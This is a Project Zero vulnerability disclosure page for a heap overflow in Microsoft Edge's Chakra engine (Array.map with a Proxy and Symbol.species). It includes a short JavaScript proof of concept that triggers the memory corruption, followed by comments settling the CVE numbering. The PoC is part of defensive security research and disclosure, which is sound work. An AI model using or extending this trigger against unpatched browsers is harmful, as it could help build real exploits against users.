923 - Microsoft Edge: Heap Overflow in Array.map - project-zero

Starred by 1 user

Status:	Fixed
Owner:	natashenka@google.com
Closed:	Oct 2016
Cc:	project-...@google.com
Finder-natashenka Deadline-90 CCProjectZeroMembers Severity-High Vendor-Microsoft Product-Edge Reported-2016-Sep-1 MSRC-34948 CVE-2016-7190 CVE-2016-3377

Microsoft Edge: Heap Overflow in Array.map

Project Member Reported by natashenka@google.com, Sep 1 2016

Back to list

There is a heap overflow in Array.map in Chakra. In Js::JavascriptArray::MapHelper, if the array that is being mapped is a Proxy, ArraySpeciesCreate is used to create the array that the mapped values are copied into. They are then written to the array using DirectSetItemAt, even through there is no guarantee the array is a Var array. If it is actually an int array, it will be shorter than this function expects, causing a heap overflow. A minimal PoC is as follows:

var d = new Array(1,2,3);
class dummy{

	constructor(){
		alert("in constructor");
		return d;
        }

}

var handler = {
    get: function(target, name){

	if(name == "length"){
		return 0x100;
	}
	return {[Symbol.species] : dummy};
    },

    has: function(target, name){
	return true;
    }
};

var p = new Proxy([], handler);

var a = new Array(1,2,3);

function test(){
	return 0x777777777777;

}

var o = a.map.call(p, test);

A full PoC is attached.


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

map.html
731 bytes View Download

Project Member Comment 1 by natashenka@google.com, Sep 8 2016

Labels: MSRC-34948

Project Member Comment 2 by natashenka@google.com, Oct 11 2016

Labels: CVE-2016-7190

Project Member Comment 3 by natashenka@google.com, Oct 12 2016

Status: Fixed

Project Member Comment 4 by natashenka@google.com, Oct 19 2016

Labels: -Restrict-View-Commit

Comment 5 by soulchen...@gmail.com, Dec 11 2016

Hi,I have a question.
I think this issue is the same with CVE-2016-3377 which is fixed in Sep.
Why this issue has a different CVE number and fixed in Oct again...
Thanks for your help!

Project Member Comment 6 by natashenka@google.com, Dec 11 2016

I took a look at this in September, and from what I could tell they fixed a different vulnerability in Array.map than the one I reported.

Comment 7 by soulchen...@gmail.com, Dec 12 2016

Hello,thank for your patient reply.
Here is the diff and PoC about 3377 in September:
https://github.com/Microsoft/ChakraCore/commit/24c4d7df8199b27d360323ce3be1d7959fd918eb#diff-49bb5a3c5aa249e3dcefd245e91df5f7
Could you mind to have a look,plz..
On the other hand ,I can't repo your PoC in the version between September to Oct.

Project Member Comment 8 by natashenka@google.com, Dec 15 2016

Labels: CVE-2016-3377

I checked with Microsoft, and they confirmed these are the same issue.

► Sign in to add a comment